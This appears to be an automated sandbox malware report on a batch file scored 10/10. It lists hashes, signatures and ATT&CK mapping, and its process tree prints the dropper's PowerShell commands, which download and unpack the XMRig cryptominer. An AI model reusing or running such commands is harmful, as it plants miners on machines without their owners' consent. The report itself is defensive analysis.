Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    2.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2164

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    a724f130db081ad9212ca63a7a200878

    SHA1

    1db257aa7b66f3c07b8507e035517130625d63c0

    SHA256

    85dfc80102e78d0a7b943c68f5470f7e2805f6e1f1110b4d1b05a97f97672054

    SHA512

    23e5077b51ba631a16f039c87789d951b304268d304e6a753cd9a48c332da28d9667e6d28d4587069a3c3ad0d7951c552e8c75010f305a369c18888b7bd89932

  • memory/2164-17-0x000000001B2D0000-0x000000001B5B2000-memory.dmp
    Filesize

    2.9MB

  • memory/2164-18-0x0000000002410000-0x0000000002418000-memory.dmp
    Filesize

    32KB

  • memory/2824-4-0x000007FEF53CE000-0x000007FEF53CF000-memory.dmp
    Filesize

    4KB

  • memory/2824-5-0x000000001B350000-0x000000001B632000-memory.dmp
    Filesize

    2.9MB

  • memory/2824-6-0x0000000001F30000-0x0000000001F38000-memory.dmp
    Filesize

    32KB

  • memory/2824-7-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp
    Filesize

    9.6MB

  • memory/2824-8-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp
    Filesize

    9.6MB

  • memory/2824-9-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp
    Filesize

    9.6MB

  • memory/2824-10-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp
    Filesize

    9.6MB

  • memory/2824-11-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp
    Filesize

    9.6MB